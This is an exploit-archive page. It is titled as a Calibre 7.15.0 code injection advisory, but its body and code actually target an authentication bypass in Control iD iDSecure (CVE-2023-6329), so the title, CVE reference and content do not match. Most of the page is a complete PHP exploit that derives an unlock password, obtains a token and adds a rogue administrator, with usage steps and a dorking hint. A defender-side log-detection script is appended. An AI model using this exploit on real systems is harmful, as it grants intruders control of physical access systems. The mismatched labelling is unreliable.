| Reporter | Title | Published | Views |
|---|---|---|---|
| zdt | Calibre 7.15.0 Python Code Injection Exploit | 8 Aug 2024 00:00 | – |
| githubexploit | Exploit for CVE-2024-6782 | 15 Sep 2024 18:45 | – |
| githubexploit | Exploit for CVE-2024-6782 | 15 Sep 2024 18:45 | – |
| githubexploit | Exploit for CVE-2024-6782 | 9 Aug 2024 06:25 | – |
| githubexploit | Exploit for CVE-2024-6782 | 6 Aug 2024 15:31 | – |
| githubexploit | Exploit for Improper Authentication in Controlid Idsecure | 11 Mar 2026 15:04 | – |
| circl | CVE-2023-6329 | 17 Dec 2023 09:37 | – |
| circl | CVE-2024-6782 | 6 Aug 2024 07:28 | – |
| cnnvd | Control iD iDSecure Security Breach | 27 Nov 2023 00:00 | – |
| cnvd | Calibre Access Control Error Vulnerability | 9 Aug 2024 00:00 | – |
=============================================================================================================================================
| # Title : Calibre 7.15.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://download.calibre-ebook.com/7.15.0/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description: It is used to exploit a vulnerability in the Control iD iDSecure access control system that allows unauthenticated remote attackers to access the system administration interface and add a new administrative user.
Main uses of the code:
Version check: The code first checks whether the current version of the system is affected by the specified vulnerability (CVE-2023-6329).
If the version is affected by the vulnerability (less than or equal to 4.7.43.0), the exploit can be executed.
Sensitive data extraction: Extracts data such as serial and passwordRandom from the target server using a GET request to a specific API.
This data is used to generate a custom password (passwordCustom) which is part of the authentication process.
( https://packetstorm.news/files/id/180007/ CVE-2024-6782)
[+] save code as poc.php.
[+] Set Target : line 162
[+] Usage : php poc.php
[+] Payload :
<?php
class ControlIDiDSecureAuthBypass {
private $target_uri;
private $new_user;
private $new_password;
public function __construct($target_uri, $new_user = null, $new_password = null) {
$this->target_uri = $target_uri;
$this->new_user = $new_user ?? bin2hex(random_bytes(4)); // Default to random alphanumeric user
$this->new_password = $new_password ?? bin2hex(random_bytes(6)); // Default to random alphanumeric password
}
// Check if vulnerable version is running
public function check() {
$url = $this->target_uri . '/api/util/configUI';
$response = $this->send_request($url, 'GET');
if ($response['code'] != 401) {
return 'Unknown';
}
$data = json_decode($response['body'], true);
$version = $data['Version'] ?? null;
if (is_null($version)) {
return 'Unknown';
}
echo "Got version: $version\n";
if (version_compare($version, '4.7.43.0', '<=')) {
return 'Appears';
}
return 'Safe';
}
// Exploit to add a new user
public function run() {
// Step 1: Get serial and passwordRandom
$url = $this->target_uri . '/api/login/unlockGetData';
$response = $this->send_request($url, 'GET');
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
$password_random = $json['passwordRandom'] ?? null;
$serial = $json['serial'] ?? null;
if (!$password_random || !$serial) {
throw new Exception('Unable to retrieve passwordRandom and serial');
}
echo "Retrieved passwordRandom: $password_random\n";
echo "Retrieved serial: $serial\n";
// Step 2: Create passwordCustom
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = base_convert($short_hash, 16, 10);
echo "Created passwordCustom: $password_custom\n";
// Step 3: Login with passwordCustom and passwordRandom to get JWT
$body = json_encode([
'passwordCustom' => $password_custom,
'passwordRandom' => $password_random
]);
$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
$access_token = $json['accessToken'] ?? null;
if (!$access_token) {
throw new Exception('Did not receive JWT');
}
echo "Retrieved JWT: $access_token\n";
// Step 4: Add a new administrative user
$body = json_encode([
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
]);
$url = $this->target_uri . '/api/operator/';
$response = $this->send_request($url, 'POST', $body, $access_token);
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
if ($json['code'] !== 200 || $json['error'] !== 'OK') {
throw new Exception('Unexpected reply from server');
}
// Step 5: Confirm the new credentials work
$body = json_encode([
'username' => $this->new_user,
'password' => $this->new_password,
'passwordCustom' => null
]);
$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
if (!isset($json['accessToken']) || !isset($json['unlock'])) {
throw new Exception('Received unexpected reply');
}
echo "New user '{$this->new_user}:{$this->new_password}' was successfully added.\n";
echo "Login at: " . $this->target_uri . "/#/login\n";
}
// Helper function to send HTTP requests
private function send_request($url, $method, $body = null, $token = null) {
$headers = [
'Content-Type: application/json'
];
if ($token) {
$headers[] = "Authorization: Bearer $token";
}
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($body) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response_body = curl_exec($ch);
$response_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ['code' => $response_code, 'body' => $response_body];
}
}
// Example usage:
$target_uri = 'https://example.com';
$module = new ControlIDiDSecureAuthBypass($target_uri);
if ($module->check() === 'Appears') {
$module->run();
}
?>
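A defender-side check for the request sequence described above, added here as an example (it is not part of the original advisory or of any vendor tooling). It flags a client that requests `/api/login/unlockGetData`, then logs in, then creates an operator, and it applies the version bound stated on the page. The combined log format, the 5-minute window, the sample log lines and the function names are assumptions.

```python
import re
from datetime import datetime, timedelta

# Order of requests made by the PoC on this page (trailing slashes stripped).
CHAIN = [("GET", "/api/login/unlockGetData"),
         ("POST", "/api/login"),
         ("POST", "/api/operator")]
WINDOW = timedelta(minutes=5)  # assumption: correlation window per client
# Assumption: combined-format access log from a proxy in front of the web UI.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2025:10:00:01 +0000] "GET /api/util/configUI HTTP/1.1" 401 112
203.0.113.7 - - [12/Mar/2025:10:00:02 +0000] "GET /api/login/unlockGetData HTTP/1.1" 200 96
203.0.113.7 - - [12/Mar/2025:10:00:02 +0000] "POST /api/login/ HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2025:10:00:03 +0000] "POST /api/operator/ HTTP/1.1" 200 40
198.51.100.20 - - [12/Mar/2025:10:05:00 +0000] "POST /api/login/ HTTP/1.1" 200 512
198.51.100.20 - - [12/Mar/2025:10:05:30 +0000] "POST /api/operator/ HTTP/1.1" 200 40
""".splitlines()

def is_affected(version):
    """True if a dotted version is <= 4.7.43.0, the bound given on the page."""
    return tuple(int(p) for p in version.split(".")) <= (4, 7, 43, 0)

def find_chains(lines):
    """Return (client_ip, timestamp) for every completed request chain."""
    state, hits = {}, []  # state: ip -> (index of next expected step, start time)
    for line in lines:
        m = LINE.match(line)
        if not m or not m.group(5).startswith("2"):
            continue  # unparsable line or non-2xx response
        ip, ts, method, path = m.group(1, 2, 3, 4)
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        req = (method, path.split("?")[0].rstrip("/"))
        if req == CHAIN[0]:
            state[ip] = (1, when)  # chain (re)starts at unlockGetData
        elif ip in state:
            step, started = state[ip]
            if when - started > WINDOW:
                del state[ip]  # partial chain went stale
            elif req == CHAIN[step]:
                if step + 1 == len(CHAIN):
                    hits.append((ip, when.isoformat()))
                    del state[ip]
                else:
                    state[ip] = (step + 1, started)
    return hits
```

An ordinary operator login followed by operator creation (the second client in the sample) is not flagged, because the chain only starts at the `unlockGetData` request.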
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================